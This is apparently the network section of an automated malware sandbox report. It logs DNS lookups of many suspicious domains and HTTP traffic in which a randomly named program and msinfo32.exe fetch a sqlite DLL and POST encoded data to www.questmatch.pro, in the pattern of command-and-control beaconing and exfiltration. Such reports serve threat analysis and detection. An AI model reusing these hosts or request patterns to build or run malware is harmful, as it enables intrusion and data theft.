                                                                                                            Dec 12, 2024 10:21:14.540019035 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:15.304414034 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:17.091012955 CET5809553192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:17.446501970 CET53580958.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:17.447364092 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:18.206072092 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:18.970417976 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:20.870718002 CET5426153192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:21.247852087 CET53542618.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:21.248641014 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:22.012428045 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:22.776838064 CET137137192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:28.694618940 CET6050753192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:29.045106888 CET53605078.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:34.670978069 CET138138192.168.2.22192.168.2.255
                                                                                                            Dec 12, 2024 10:21:43.269596100 CET5044653192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:43.632327080 CET53504468.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:21:58.168893099 CET5593953192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:21:58.304864883 CET53559398.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:22:12.771517992 CET4960853192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:22:12.905580997 CET53496088.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:22:27.271106005 CET6148653192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:22:27.662798882 CET53614868.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:22:42.066189051 CET6245353192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:22:42.701673031 CET53624538.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:22:57.163642883 CET5056853192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:22:57.297498941 CET53505688.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:23:11.595437050 CET6146753192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:23:11.985996008 CET53614678.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:23:26.395190001 CET6161853192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:23:26.638597012 CET53616188.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:23:41.996026039 CET5442253192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:23:42.236202955 CET53544228.8.8.8192.168.2.22
                                                                                                            Dec 12, 2024 10:23:56.986052036 CET5207453192.168.2.228.8.8.8
                                                                                                            Dec 12, 2024 10:23:57.508109093 CET53520748.8.8.8192.168.2.22

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 12, 2024 10:20:13.805001020 CET192.168.2.228.8.8.80xc225Standard query (0)www.zoiheat.xyzA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:19.632810116 CET192.168.2.228.8.8.80x8325Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:20.143145084 CET192.168.2.228.8.8.80x8325Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:20.652456999 CET192.168.2.228.8.8.80x8325Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:31.610902071 CET192.168.2.228.8.8.80x2825Standard query (0)www.questmatch.proA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:46.232160091 CET192.168.2.228.8.8.80xe690Standard query (0)www.mrpokrovskii.proA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:01.257534981 CET192.168.2.228.8.8.80xa65aStandard query (0)www.sodatool.siteA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:02.422164917 CET192.168.2.228.8.8.80xd0edStandard query (0)www.sodatool.siteA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:03.592145920 CET192.168.2.228.8.8.80x926cStandard query (0)www.sodatool.siteA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:04.750890017 CET192.168.2.228.8.8.80xb69cStandard query (0)www.sodatool.siteA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:09.955506086 CET192.168.2.228.8.8.80x5021Standard query (0)www.tb0.shopA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:13.638585091 CET192.168.2.228.8.8.80xc46fStandard query (0)www.tb0.shopA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:17.091012955 CET192.168.2.228.8.8.80xfd30Standard query (0)www.tb0.shopA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:20.870718002 CET192.168.2.228.8.8.80x7701Standard query (0)www.tb0.shopA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:28.694618940 CET192.168.2.228.8.8.80xd94Standard query (0)www.kvsj.netA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:43.269596100 CET192.168.2.228.8.8.80x70b4Standard query (0)www.learniit.infoA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:58.168893099 CET192.168.2.228.8.8.80xcc6Standard query (0)www.bankseedz.infoA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:12.771517992 CET192.168.2.228.8.8.80xb45cStandard query (0)www.dietcoffee.onlineA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:27.271106005 CET192.168.2.228.8.8.80x8554Standard query (0)www.smartcongress.netA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:42.066189051 CET192.168.2.228.8.8.80x1bbbStandard query (0)www.carsten.studioA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:57.163642883 CET192.168.2.228.8.8.80x6d9dStandard query (0)www.krshop.shopA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:11.595437050 CET192.168.2.228.8.8.80xda8cStandard query (0)www.rysanekbeton.cloudA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:26.395190001 CET192.168.2.228.8.8.80xe617Standard query (0)www.airrelax.shopA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:41.996026039 CET192.168.2.228.8.8.80xd38aStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:56.986052036 CET192.168.2.228.8.8.80xf189Standard query (0)www.diozusemails.buzzA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 12, 2024 10:20:14.487454891 CET8.8.8.8192.168.2.220xc225No error (0)www.zoiheat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:14.487454891 CET8.8.8.8192.168.2.220xc225No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:14.487454891 CET8.8.8.8192.168.2.220xc225No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:20.142815113 CET8.8.8.8192.168.2.220x8325No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:20.652255058 CET8.8.8.8192.168.2.220x8325No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:20.786238909 CET8.8.8.8192.168.2.220x8325No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:31.850424051 CET8.8.8.8192.168.2.220x2825No error (0)www.questmatch.pro188.114.97.6A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:31.850424051 CET8.8.8.8192.168.2.220x2825No error (0)www.questmatch.pro188.114.96.6A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:20:46.863133907 CET8.8.8.8192.168.2.220xe690No error (0)www.mrpokrovskii.pro85.25.177.138A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:01.407386065 CET8.8.8.8192.168.2.220xa65aName error (3)www.sodatool.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:02.573925018 CET8.8.8.8192.168.2.220xd0edName error (3)www.sodatool.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:03.741609097 CET8.8.8.8192.168.2.220x926cName error (3)www.sodatool.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:04.903347015 CET8.8.8.8192.168.2.220xb69cName error (3)www.sodatool.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:10.329721928 CET8.8.8.8192.168.2.220x5021Name error (3)www.tb0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:13.774641991 CET8.8.8.8192.168.2.220xc46fName error (3)www.tb0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:17.446501970 CET8.8.8.8192.168.2.220xfd30Name error (3)www.tb0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:21.247852087 CET8.8.8.8192.168.2.220x7701Name error (3)www.tb0.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:29.045106888 CET8.8.8.8192.168.2.220xd94No error (0)www.kvsj.net173.236.199.97A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:43.632327080 CET8.8.8.8192.168.2.220x70b4No error (0)www.learniit.info203.161.42.73A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:21:58.304864883 CET8.8.8.8192.168.2.220xcc6No error (0)www.bankseedz.info46.30.211.38A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:12.905580997 CET8.8.8.8192.168.2.220xb45cNo error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:27.662798882 CET8.8.8.8192.168.2.220x8554No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:27.662798882 CET8.8.8.8192.168.2.220x8554No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:42.701673031 CET8.8.8.8192.168.2.220x1bbbNo error (0)www.carsten.studiocarsten.studioCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:42.701673031 CET8.8.8.8192.168.2.220x1bbbNo error (0)carsten.studio217.160.0.200A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:57.297498941 CET8.8.8.8192.168.2.220x6d9dNo error (0)www.krshop.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:22:57.297498941 CET8.8.8.8192.168.2.220x6d9dNo error (0)www.krshop.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:11.985996008 CET8.8.8.8192.168.2.220xda8cNo error (0)www.rysanekbeton.cloudrysanekbeton.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:11.985996008 CET8.8.8.8192.168.2.220xda8cNo error (0)rysanekbeton.cloud81.2.196.19A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:26.638597012 CET8.8.8.8192.168.2.220xe617No error (0)www.airrelax.shop172.67.215.235A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:26.638597012 CET8.8.8.8192.168.2.220xe617No error (0)www.airrelax.shop104.21.16.206A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:42.236202955 CET8.8.8.8192.168.2.220xd38aNo error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:42.236202955 CET8.8.8.8192.168.2.220xd38aNo error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 10:23:57.508109093 CET8.8.8.8192.168.2.220xf189No error (0)www.diozusemails.buzz69.48.179.238A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.zoiheat.xyz
                                                                                                            • www.sqlite.org
                                                                                                            • www.questmatch.pro
                                                                                                            • www.mrpokrovskii.pro
                                                                                                            • www.kvsj.net
                                                                                                            • www.learniit.info
                                                                                                            • www.bankseedz.info
                                                                                                            • www.dietcoffee.online
                                                                                                            • www.smartcongress.net
                                                                                                            • www.carsten.studio
                                                                                                            • www.krshop.shop
                                                                                                            • www.rysanekbeton.cloud
                                                                                                            • www.airrelax.shop
                                                                                                            • www.vayui.top

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.224916585.159.66.93801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:14.655329943 CET540OUTGET /ti6k/?e2E=wRQ8oHXx&x4=aooN9XnxZY5vLLqjRSo6DpWN4fgsD3CW9S/CD7OrytslWQsmx2XgIWNhq2ot6qnFvMzcVXyCAoOGhogdqicJCN8EOoBxC+Cz12DK8fUp+S6/f8QxRRTszX5C8Y75 HTTP/1.1
                                                                                                            Host: www.zoiheat.xyz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:20:15.986624002 CET225INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.14.1
                                                                                                            Date: Thu, 12 Dec 2024 09:20:15 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                            X-Rate-Limit-Reset: 2024-12-12T09:20:20.7730248Z


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.224916645.33.6.223803736C:\Windows\SysWOW64\msinfo32.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:20.920856953 CET291OUTGET /2019/sqlite-dll-win32-x86-3270000.zip HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Host: www.sqlite.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Dec 12, 2024 10:20:22.073776007 CET249INHTTP/1.1 200 OK
                                                                                                            Connection: keep-alive
                                                                                                            Date: Thu, 12 Dec 2024 09:20:21 GMT
                                                                                                            Last-Modified: Fri, 08 Feb 2019 13:45:40 GMT
                                                                                                            Cache-Control: max-age=120
                                                                                                            ETag: "m5c5d8804s75419"
                                                                                                            Content-type: application/zip; charset=utf-8
                                                                                                            Content-length: 480281
                                                                                                            Dec 12, 2024 10:20:22.074035883 CET1236INData Raw: 50 4b 03 04 14 00 00 00 08 00 0c 03 48 4e 8e f8 a0 df 28 05 00 00 a1 15 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 c7 69 5c 5c c7 69 5c 5c 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 cd 72 dc 36 0c 80 ef 79 9b c4 1d
                                                                                                            Data Ascii: PKHN(sqlite3.defUTi\\i\\uxr6yO_ fzP"x~?HnzA$A~KI/w0-F{CMo&|F?,pN]Z;!p[pV&:=yYg[@N89xO%JLo3x8Xx
                                                                                                            Dec 12, 2024 10:20:22.074050903 CET1236INData Raw: 5b 70 33 65 f5 b6 a2 ee 96 5d b5 a5 b8 bb 3e 3f 68 73 31 6d 56 06 2c ec d2 31 23 11 06 dd e3 b6 8d 7a ef ca 56 9c 18 06 43 5d c1 6c b6 49 ac 77 68 a4 46 a7 87 95 5c aa 3f ae 22 ff 8e 92 ba db e4 55 a6 fa 5f 4c a3 3c 6a 58 20 e3 e8 f6 f2 6d 92 6e
                                                                                                            Data Ascii: [p3e]>?hs1mV,1#zVC]lIwhF\?"U_L<jX mn;a*MoFvO9Xq*Y<U:zP,`dQ7k6$/PKHNEGMsqlite3.dllUTi\\i\\ux{|T9I&a0
                                                                                                            Dec 12, 2024 10:20:22.074057102 CET1236INData Raw: 59 f1 87 01 c2 fc ea 97 f3 e2 4d a1 9e d1 70 38 32 2b ff c4 88 53 18 01 65 78 bd 8c 09 7e d4 fd f3 b0 5d 58 10 c7 25 d4 38 1a d5 5f ff 43 e4 f0 ca 42 d2 48 8e ca 3d 89 55 6d 64 86 4a 43 25 d2 26 03 71 c4 42 f5 14 76 7a 6b b2 15 81 62 01 ec e8 0b
                                                                                                            Data Ascii: YMp82+Sex~]X%8_CBH=UmdJC%&qBvzkb`DN1EsGyL}80D]lZay"QaoBZOt *t<Io^YA'fYNg8$j~g2;WWd6ERZ,Y?=M
                                                                                                            Dec 12, 2024 10:20:22.074100971 CET1236INData Raw: 8e 63 c1 a9 42 ed cc fe 1f e0 c0 73 a4 55 4c b0 48 3d 19 52 f7 fa 0b da 82 e0 f0 ad 92 0d 3e 9b 7c 2a 56 a2 4d a3 81 9e cc f9 f0 c5 f6 27 c7 7d 42 ce 45 32 90 11 e8 5e 3f 59 9b 41 06 8c 78 2d 21 f8 ed 34 29 c6 12 e8 d1 ba 49 e0 18 09 74 e1 82 a0
                                                                                                            Data Ascii: cBsULH=R>|*VM'}BE2^?YAx-!4)It]#~3Iw{=\~y(H~(;I\*GqSOj6r@5!V3 wPqv4pw,5+-$Rv>J]>V9jnvP-p=sBf}e=
                                                                                                            Dec 12, 2024 10:20:22.074110985 CET1236INData Raw: cd 84 19 3c 52 af 5a e4 73 71 42 6d 8e c5 76 74 50 ee e2 b4 34 d2 aa ac e7 3e 08 a0 1c dc b6 17 7f a0 70 ce cb 28 c8 cd 70 37 8a 36 25 9b 03 78 03 1a 40 6a 88 08 e6 0c ef a6 41 bd ea 16 d6 3c d8 6c 81 e2 14 33 1e a3 7f 1f 47 f3 6c 88 8d 62 5a 46
                                                                                                            Data Ascii: <RZsqBmvtP4>p(p76%x@jA<l3GlbZFEd!$0J6$kCtU?|INu9x,I6yi7$MnJ2,^liN$ZxqLuL03{<`6e b iH9BQo$d`y(l?6 jBi
                                                                                                            Dec 12, 2024 10:20:22.074116945 CET1236INData Raw: 83 16 4f 29 95 cb 53 4c e5 71 d4 93 07 f3 58 48 bd 99 72 ba 49 5c a4 f8 bb 9a 7c 5d ba 00 d7 cd 8e 39 d7 ff 93 ed bb b9 54 c6 69 78 8d 34 5a 80 73 3c 31 3d d0 8d 3b 02 12 47 b9 31 2c 9f 08 93 85 88 6f bc ba cc 12 6f 42 c4 d2 a6 64 c8 bf 42 96 2e
                                                                                                            Data Ascii: O)SLqXHrI\|]9Tix4Zs<1=;G1,ooBdB._p|64Vc`7A/,P6'/FoQ"oNJ",7U9]0LyiN/kzt3&-i\u1$xsW
                                                                                                            Dec 12, 2024 10:20:22.074130058 CET1236INData Raw: 87 12 6a 97 27 40 f3 a9 c7 de e4 1b d4 77 1b 76 f0 01 5c b5 e2 1f 54 7f a3 21 cb 37 48 fd 97 a3 f7 af e4 d3 a6 d3 8e e4 d3 c5 ed ea 1a 64 a8 7c 5d c4 df 7d f6 bb 20 07 b6 e3 79 ed e6 05 d2 2d a4 91 9c 80 ed 68 fb 09 6c 98 1c 0e af 8f 91 47 bf 2e
                                                                                                            Data Ascii: j'@wv\T!7Hd|]} y-hlG.N,56hOnFV?ei3X{l3)Y7(!x-am4/MMRwe@$Y9h\X4T-VV&)4@.vzjIu-vn7
                                                                                                            Dec 12, 2024 10:20:22.074321032 CET1236INData Raw: 7e 40 d3 e4 eb 65 12 62 0e 83 61 87 78 d5 0d c1 7e 6f 0c 20 b6 43 4c c0 88 c7 b1 8d b7 41 3f 6e c1 af 05 98 73 89 83 dd bb b9 dc 17 03 93 d7 0e 3b b3 e9 56 37 3f 69 11 af fd eb 46 9e 4b 32 c5 7b 01 a3 7a 3d c4 eb d4 b5 8e 22 6d 69 f4 38 4c 8c ce
                                                                                                            Data Ascii: ~@ebax~o CLA?ns;V7?iFK2{z="mi8LLDY{486L2Tlvw_gTt@Isp3o,i``UE7G~.%ew#h#?oZjn/x^j[ZD
                                                                                                            Dec 12, 2024 10:20:22.074331045 CET1236INData Raw: b5 49 dc 98 6a 83 b2 ca 4a 8e 23 d6 24 66 dc 17 b8 5d de b2 c0 b4 29 95 66 a5 28 05 20 2b a5 10 ef 02 d8 0e f1 36 83 16 24 e1 02 e9 66 97 f4 34 bf 7b 91 dc 90 a7 fd 7d ec d4 a7 40 44 26 a3 4d c8 69 6d cc 76 70 57 44 cc e0 90 b2 8f 4a 53 e4 72 3b
                                                                                                            Data Ascii: IjJ#$f])f( +6$f4{}@D&MimvpWDJSr;7mM>T/>q[qNx9SCrY}I+b?-#+497v,5l&xNq*Db5U?7m)v)MXM-R./zM@#`hM$KItI
                                                                                                            Dec 12, 2024 10:20:22.193617105 CET1236INData Raw: 57 18 9a d5 92 31 29 90 b4 b6 1e 30 a2 8b ae b0 e0 f8 19 fb 56 57 7c 53 fc 71 1c 0a c8 85 cf 22 06 c9 c5 a8 65 ef 0a a3 e6 c4 02 80 62 1c 45 e0 db 97 23 d8 56 6f 12 30 88 be 4e 04 44 f0 00 f7 38 5e 03 15 a6 e0 f7 26 06 b8 3d be 9e f4 02 02 c4 b7
                                                                                                            Data Ascii: W1)0VW|Sq"ebE#Vo0ND8^&=VaZfF.PoMr*>A}Mv&Ka,3{,;FX|e%|h~$kzTV.B!K< %nf]oFud+(%jg2n^fA_`v_c


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.2249167188.114.97.6801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:31.988941908 CET2472OUTPOST /1yxc/ HTTP/1.1
                                                                                                            Host: www.questmatch.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.questmatch.pro
                                                                                                            Referer: http://www.questmatch.pro/1yxc/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 68 50 48 57 33 44 36 55 44 36 46 62 58 4f 73 55 4a 6c 64 67 64 65 47 73 5a 43 51 6b 44 36 35 53 43 41 53 68 64 46 37 79 54 38 69 67 76 4a 53 61 67 32 48 72 31 50 52 36 4c 6d 4f 46 53 65 42 70 34 74 4b 41 51 72 53 77 48 76 30 49 38 56 5a 78 31 66 32 62 4e 50 7a 4a 47 7a 6c 74 74 56 5a 6e 70 45 55 45 62 52 73 35 2b 46 76 63 71 71 7a 77 51 41 35 4b 6d 6b 75 54 4e 59 2f 6a 46 35 38 61 66 6d 31 66 76 71 32 6a 34 73 4b 6c 50 42 61 66 46 75 2b 47 4f 55 72 69 57 4a 51 66 6d 31 69 4b 31 51 78 51 76 63 6d 74 57 6c 36 70 33 78 47 66 32 64 48 55 2f 67 6b 68 63 43 70 4b 58 4d 68 31 44 5a 5a 7a 6f 45 6d 48 31 62 56 2b 68 6f 68 32 77 35 66 54 45 36 50 6b 76 65 32 49 33 65 75 61 6e 34 75 74 6e 6f 70 79 50 66 41 69 52 78 36 4c 37 46 53 57 57 31 50 64 53 44 59 49 51 62 4b 6c 64 79 70 64 73 4f 65 5a 4e 38 74 38 57 77 47 66 38 58 39 52 76 34 41 30 45 43 69 69 41 71 69 45 34 30 6c 32 48 71 31 65 38 38 48 45 4c 71 49 6f 4f 56 4a 44 72 6b 66 78 66 50 32 33 61 55 70 72 44 48 4a 33 6c 71 78 4d 66 5a 53 62 72 68 66 [TRUNCATED]
                                                                                                            Data Ascii: x4=hPHW3D6UD6FbXOsUJldgdeGsZCQkD65SCAShdF7yT8igvJSag2Hr1PR6LmOFSeBp4tKAQrSwHv0I8VZx1f2bNPzJGzlttVZnpEUEbRs5+FvcqqzwQA5KmkuTNY/jF58afm1fvq2j4sKlPBafFu+GOUriWJQfm1iK1QxQvcmtWl6p3xGf2dHU/gkhcCpKXMh1DZZzoEmH1bV+hoh2w5fTE6Pkve2I3euan4utnopyPfAiRx6L7FSWW1PdSDYIQbKldypdsOeZN8t8WwGf8X9Rv4A0ECiiAqiE40l2Hq1e88HELqIoOVJDrkfxfP23aUprDHJ3lqxMfZSbrhfWJoqXnsMocnTCjz+Qmir5pllbZuO4tc/4nb3kL9K+n/e43jPasoPbfKFsCydB7E0YIZDv0w2clmxE323ifWz0it/iPRuZTzWcZJWib2ykBM0Z9UUogeBmThIBZaZ40W4PfBdVmtjvWYstjtSiqkNP+WRopyOYz3N1qLn33PlpebAKNHgY87YNhKBFAI5xx0RkdHXev5LVKFe5ETuJ6kmhsM/DHtDPSsyOR7Vgve/FWSc8t6On7Ja30OFgAvDVhVTr9MPE1lKURhwWEzR1Y+8jb9nA9jwODC2mBd0XhOK8KoHBYzd9nGM4iJWzdHpW6drVi1VQkjoH847RLkkc65oGdhQp36MgyH3UznSGLlohRS98RpAnEo5RDXD0LauIT3Z5kkNnu+kFynRrpkD1BAK1eXqy6wonf2qXsw/eE2L8kvHKSyMTubCGPeKBaOpifYq1J+gtsrbvy3zUFW4Au0S9/4CgbCr5gY5YFauEmD9jf8Vr314sMYkqnN6r98a9qpcs1g8ZeK297QpFnol7sw4uVZYr2+CQDcTQREs9nMUa4MMSKHvkBbBiQe+lGmrTkwrcxVXEAs8m/TQHcndTnyVzdIbwn+RB1FEd8EViZ51tBr/tlii1ROyeGS5ihqOXQOWg7MVhbViijMka1QpjR/maBh5P5OKot0lr9 [TRUNCATED]
                                                                                                            Dec 12, 2024 10:20:32.108922005 CET300OUTData Raw: 53 4f 6e 30 4b 48 41 6d 57 48 50 6b 6c 64 32 46 34 72 48 72 44 34 71 43 4d 57 58 72 69 77 75 38 78 54 51 4f 7a 42 6a 72 68 74 47 4f 65 6f 56 67 59 4f 69 55 47 4c 70 33 68 38 4c 4c 58 66 33 55 36 57 78 32 56 47 59 78 61 54 33 44 6e 36 71 43 74 57
                                                                                                            Data Ascii: SOn0KHAmWHPkld2F4rHrD4qCMWXriwu8xTQOzBjrhtGOeoVgYOiUGLp3h8LLXf3U6Wx2VGYxaT3Dn6qCtWhQr2oofBEBb8OAZQV3pz8LoH1830fum2uC40JX+itdD82+QZZ/7+Ljo+7gP0bIXBzwgxrfMvsIBUYNrYM6pXM9biNHKipyQqkRBDYi5nggpIi7Fl5omhIUee+7sgoHrRCTDL6d5h0o0n4blYPRZe/ZDqM6CZyZbrq
                                                                                                            Dec 12, 2024 10:20:33.240324020 CET1236INHTTP/1.1 404
                                                                                                            Date: Thu, 12 Dec 2024 09:20:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Origin
                                                                                                            Vary: Access-Control-Request-Method
                                                                                                            Vary: Access-Control-Request-Headers
                                                                                                            X-Correlation-ID: a9c98ab6-ff4c-4420-960a-3f6c4150e61d
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: 0
                                                                                                            CF-Connecting-IP: 8.46.123.175
                                                                                                            CF-IPCountry: US
                                                                                                            CF-Cache-Status: DYNAMIC
